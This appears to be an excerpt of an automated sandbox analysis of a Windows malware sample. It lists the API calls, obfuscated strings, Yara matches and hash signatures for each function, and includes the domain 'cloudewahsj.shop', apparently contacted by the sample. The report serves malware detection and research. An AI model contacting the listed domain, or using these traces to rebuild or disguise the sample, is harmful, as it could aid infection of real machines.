                                                                                                    • Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                                                                    • Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
                                                                                                    • Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                                                                    • Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                                                                    • Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
                                                                                                    • Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                                                                    • Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                                                                    • Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
                                                                                                    • Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                                                                    • Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020804B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291465028.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_2080000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction ID: 22c0b33adfcfe409e24bde8d3ee93e7e27180868161be3bafd6f1774acb1f693
                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction Fuzzy Hash: FA113C79A40208EFDB01DF98C985E99BBF5AF08350F058094F9889B361D771EA50EF80
                                                                                                    APIs
                                                                                                    • CoCreateInstance.COMBASE(80838290,00000000,00000001,?,00000000), ref: 020ED7D9
                                                                                                    • SysAllocString.OLEAUT32 ref: 020ED86F
                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 020ED8AD
                                                                                                    • SysAllocString.OLEAUT32 ref: 020ED90F
                                                                                                    • SysAllocString.OLEAUT32 ref: 020ED9CC
                                                                                                    • VariantInit.OLEAUT32(?), ref: 020EDA3D
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 020EDDC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
                                                                                                    • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                                                    • API String ID: 2895375541-1972840126
                                                                                                    • Opcode ID: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
                                                                                                    • Instruction ID: 7492a1cd11d1e14e118d720eeef5ca01272c4629f4450cb79c40726afeee9209
                                                                                                    • Opcode Fuzzy Hash: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
                                                                                                    • Instruction Fuzzy Hash: CC620172A183518FE724CF28C88576FBBE5EF85314F18892CE5D58B390D7799849CB82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6$6y$EnA$PNH$YjM$YjM$fjM$fjM$pSlM$yx$y~${
                                                                                                    • API String ID: 0-997667657
                                                                                                    • Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                                                                    • Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
                                                                                                    • Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                                                                    • Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: *$*$PNH$q
                                                                                                    • API String ID: 237503144-436812756
                                                                                                    • Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                                                    • Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
                                                                                                    • Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                                                    • Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Uninitialize
                                                                                                    • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                                                    • API String ID: 3861434553-1392773931
                                                                                                    • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
                                                                                                    • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Uninitialize
                                                                                                    • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                                                    • API String ID: 3861434553-1392773931
                                                                                                    • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction ID: 51438051d160c2953868e4a0dd89fc5e8aa446f92324cbec0179b30c92b1dd96
                                                                                                    • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                                                    • Instruction Fuzzy Hash: 09C1107150C3D08BDB368F28C8687EBBBE1AFD2304F18496CD4D95B286D779450ACB96
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                                                    • API String ID: 0-3323421312
                                                                                                    • Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                                                    • Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
                                                                                                    • Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                                                    • Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                                                    • API String ID: 0-3323421312
                                                                                                    • Opcode ID: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                                                    • Instruction ID: c34f727d84198fccf59c3b02dbac336eea25164c760e0f2ab915ea9dfad84622
                                                                                                    • Opcode Fuzzy Hash: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                                                    • Instruction Fuzzy Hash: FBD1F47150C3808BD726CF2984943AFFBE2AFC260CF19896CE8D55B345D776850ADB86
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                                                    • API String ID: 0-1466227541
                                                                                                    • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
                                                                                                    • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                                                    • API String ID: 0-1466227541
                                                                                                    • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction ID: 60dd979476c6a6547d23b4a7c7b520d1b699dc3ad72274793d59c648e589758f
                                                                                                    • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction Fuzzy Hash: 8571033058C3D68AD3228F7AC4A07ABFFE0AF92354F1C496CE4D04B691D3798109EB56
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00419FF7
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0041A039
                                                                                                      • Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary$InitializeThunk
                                                                                                    • String ID: PNH$mj$#v
                                                                                                    • API String ID: 764372645-2996899705
                                                                                                    • Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                                                    • Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
                                                                                                    • Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                                                    • Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020C80D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 7$TW$WH$}&'$
                                                                                                    • API String ID: 237503144-3022637246
                                                                                                    • Opcode ID: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                                                    • Instruction ID: 0e365477570554d65ffa18ce70564b06fa3c57834d16a4fd58fa2204cbc1fedc
                                                                                                    • Opcode Fuzzy Hash: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                                                    • Instruction Fuzzy Hash: 2D91C0B6A083528BC314CF28C89036FBBE2FFD9354F28891CE4854B765E7748945DB56
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 020B8CEB
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 020B8CF5
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020B8DDD
                                                                                                    • GetForegroundWindow.USER32 ref: 020B8DF2
                                                                                                    • ExitProcess.KERNEL32 ref: 020B8F6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4063528623-0
                                                                                                    • Opcode ID: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                                                    • Instruction ID: 970d6ee192ff8e4825528e57c2a89ad9632e308fa036301fecf45871fced747a
                                                                                                    • Opcode Fuzzy Hash: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                                                    • Instruction Fuzzy Hash: B361A873B143144BD329AE79DC0A39AB6C79FC1710F0FC63D9995EB790EA7888069385
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #C}$@-$PNH$up$vC
                                                                                                    • API String ID: 0-3616656258
                                                                                                    • Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                                                    • Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
                                                                                                    • Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                                                    • Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 50$DM_e$FwPq$Js$'!
                                                                                                    • API String ID: 0-1711485358
                                                                                                    • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction ID: be8570831a782e447b2f0895ec75be6289b4d58d6a2f5ee518a791de92ad2e72
                                                                                                    • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction Fuzzy Hash: C751DAB45493808FE338CF25C991B8BBBB1BBA1304F609A0CE6D95B254CB759446CF97
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 67
                                                                                                    • API String ID: 237503144-1886922373
                                                                                                    • Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                                                    • Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
                                                                                                    • Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                                                    • Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 23
                                                                                                    • API String ID: 237503144-326707096
                                                                                                    • Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                                                    • Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
                                                                                                    • Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                                                    • Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 67
                                                                                                    • API String ID: 237503144-1886922373
                                                                                                    • Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                                                    • Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
                                                                                                    • Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                                                    • Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 67
                                                                                                    • API String ID: 237503144-1886922373
                                                                                                    • Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                                                    • Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
                                                                                                    • Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                                                    • Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                    • Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                                                    • Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
                                                                                                    • Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                                                    • Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M;D$>D$UUK
                                                                                                    • API String ID: 0-3649699930
                                                                                                    • Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                                                    • Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
                                                                                                    • Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                                                    • Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M;D$>D$UUK
                                                                                                    • API String ID: 0-3649699930
                                                                                                    • Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                                                    • Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
                                                                                                    • Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                                                    • Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M;D$>D$UUK
                                                                                                    • API String ID: 0-3649699930
                                                                                                    • Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                                                    • Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
                                                                                                    • Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                                                    • Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85
                                                                                                    Strings
                                                                                                    Memory Dump Source
